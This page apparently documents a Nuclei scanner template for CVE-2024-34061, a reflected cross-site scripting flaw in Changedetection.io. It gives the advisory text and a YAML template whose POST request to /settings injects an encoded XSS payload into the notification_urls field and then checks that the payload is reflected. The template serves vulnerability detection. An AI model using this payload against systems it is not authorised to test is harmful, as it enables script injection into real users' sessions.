Changedetection.io <=v0.45.21 - Cross-Site Scripting
ID: CVE-2024-34061
Severity: medium
Author: ritikchaddha
Tags: cve,cve2024,changedetection,xss
Description
Section titled “Description”Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2024-34061
info: name: Changedetection.io <=v0.45.21 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability. reference: - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-pwgc-w4x9-gw67 - https://nvd.nist.gov/vuln/detail/CVE-2024-34061 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2024-34061 cwe-id: CWE-79 metadata: verified: true max-request: 2 shodan-query: html:"Change Detection" tags: cve,cve2024,changedetection,xss
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
- | POST /settings HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save
skip-variables-check: true matchers-condition: and matchers: - type: word part: body words: - '<img src=x onerror=alert(document.domain)>' - 'is not a valid AppRise URL' condition: and
- type: word part: header words: - 'text/html'
- type: status status: - 200
extractors: - type: regex part: body name: csrf_token group: 1 regex: - 'name="csrf_token" value="([^"]+)"' internal: true# digest: 4a0a004730450221009a3bce549dadcfca9fca916a9574a594ee7f67c10af11b9df022aaf64f103e3c022012e8d6a3ee15df29938b03acbe017efdb7eef976cdf682f30637ef0f7b85a1e9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-34061.yaml"